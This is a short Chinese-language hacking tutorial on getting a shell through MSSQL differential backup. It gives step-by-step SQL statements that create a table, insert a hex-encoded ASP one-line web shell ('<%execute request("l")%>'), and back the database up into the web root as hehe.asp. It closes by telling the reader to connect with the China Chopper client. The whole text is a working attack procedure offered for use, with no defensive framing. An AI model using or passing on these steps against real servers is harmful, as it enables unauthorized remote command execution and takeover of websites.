mssql差异备份拿shell

（1）首先：

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s;

注意：0x4e6577706f7274 这个字符串是数据库名字的十六进制数字，这个这个字符串的转换用hackbar这个小工具进行转换

这里的数据库名字是：Newport 转换后就是：4e6577706f7274

（2）

create table [dbo].[hack520] ([cmd] [image]);

注意：这个是创建一个表

（3）

insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E);

这个在数据库中插入一句话木马：其中：0x3C2565786563757465207265717565737428226C2229253E 是木马内容的十六进制数字，也用hackbar 进行转换

这里的一句话的内容是：<%execute request("l")%> 转换之后：3C2565786563757465207265717565737428226C2229253E

（4）

declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433a5c696e65747075625c777777726f6f745c686568652e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT

这个是将带木马的文件备份到网站路径底下：其中：433a5c696e65747075625c777777726f6f745c686568652e617370是一句话木马的绝对路径的十六进制的数字，同样的也用hackbar进行转换

这里的一句话的绝对路径是：C:\inetpub\wwwroot\hehe.asp 转换之后：433a5c696e65747075625c777777726f6f745c686568652e617370

到这里，整个过程就结束了，用菜刀访问一下：